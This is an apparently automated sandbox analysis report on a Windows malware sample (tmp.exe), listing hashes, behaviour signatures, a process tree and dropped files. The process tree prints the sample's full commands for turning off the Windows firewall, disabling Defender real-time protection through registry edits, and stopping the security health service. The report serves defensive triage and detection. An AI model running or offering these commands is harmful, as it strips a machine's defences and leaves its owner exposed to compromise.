Analysis

  • max time kernel
    150s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/09/2022, 17:36

General

  • Target

    tmp.exe

  • Size

    296KB

  • MD5

    8cdfb3600310132dd9ad09cb6890d9ea

  • SHA1

    40a5d218edf0f1e7a4a92cdf49edd9cfa553e339

  • SHA256

    cc78318ead529739bf908265a8b843a0200e2dbfde3946be81d3a966720ebdde

  • SHA512

    26e09d28f770e40b64a71372f3000a7fbb4a2bb121966cce264fd99f5ceb36b80a1df2f3168209a5416e9c44688b5467d6eae5f225e3ace1411cc1b367777d1b

  • SSDEEP

    6144:o36YlcAiTo6FwYDjaF6SVofQSuTVt88RPmyRVi2ZD:o3xi8Enj8TVt8Qmyzi2ZD

Score
10/10

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 8 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 2 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3496
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Windows\1.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1032
      • C:\Windows\SysWOW64\netsh.exe
        NetSh Advfirewall set allprofiles state off
        3⤵
        • Modifies Windows Firewall
        PID:2604
      • C:\Windows\SysWOW64\netsh.exe
        Netsh Advfirewall show allprofiles
        3⤵
        • Modifies Windows Firewall
        PID:4580
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 1 /t REG_DWORD /f
        3⤵
          PID:4928
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /d 1 /t REG_DWORD /f
          3⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:4856
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /d 1 /t REG_DWORD /f
          3⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:4904
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /d 1 /t REG_DWORD /f
          3⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:4836
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /d 1 /t REG_DWORD /f
          3⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:4696
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /d 4 /t REG_DWORD /f
          3⤵
            PID:2688
          • C:\Windows\SysWOW64\rundll32.exe
            RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters
            3⤵
              PID:2472
          • C:\Program Files\Windows NT\win.exe
            "C:\Program Files\Windows NT\win.exe"
            2⤵
            • Executes dropped EXE
            • Drops file in Windows directory
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:1980

        Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Program Files\Windows NT\win.exe

                Filesize

                16KB

                MD5

                677f180cb0f6e41f073e396169e84da8

                SHA1

                535267d639c667e53d6150d45f924dbf00837488

                SHA256

                dac486ec62ec587f93a98ce1cdcad1314f13bd725b88a7de713f40fdb8718b1a

                SHA512

                e7015882e28062149886943b02718a19acf467a7f71b2efd1228bd0a840283084df4bf642829c440baa25f39048d8f3e917cfbc3eb659c054e9d3fb8d4a1dc49

              • C:\Program Files\Windows NT\win.exe

                Filesize

                16KB

                MD5

                677f180cb0f6e41f073e396169e84da8

                SHA1

                535267d639c667e53d6150d45f924dbf00837488

                SHA256

                dac486ec62ec587f93a98ce1cdcad1314f13bd725b88a7de713f40fdb8718b1a

                SHA512

                e7015882e28062149886943b02718a19acf467a7f71b2efd1228bd0a840283084df4bf642829c440baa25f39048d8f3e917cfbc3eb659c054e9d3fb8d4a1dc49

              • C:\Windows\1.bat

                Filesize

                1KB

                MD5

                3751c6a7204281a3d7353eb599fdb9bf

                SHA1

                df18425a3edd39cf4c333883447a468039999f80

                SHA256

                0e03c23ca35a9a2dffca6d1828088eff6ab84ba9e04a978157aabe56505879a4

                SHA512

                e781fb4f6eae1e9d21a75d55225523c4d41d2d7a4bce30c6a6028837a33ca6492b6453b3de04d9b09e03c060fa4cefdd6f76b748d7bc8af322d2559c73cc7934

              • memory/1980-149-0x0000000000400000-0x000000000040C000-memory.dmp

                Filesize

                48KB

              • memory/3496-132-0x0000000000400000-0x0000000000529000-memory.dmp

                Filesize

                1.2MB

              • memory/3496-134-0x0000000000400000-0x0000000000529000-memory.dmp

                Filesize

                1.2MB

              • memory/3496-133-0x0000000000400000-0x0000000000529000-memory.dmp

                Filesize

                1.2MB

              • memory/3496-150-0x0000000000400000-0x0000000000529000-memory.dmp

                Filesize

                1.2MB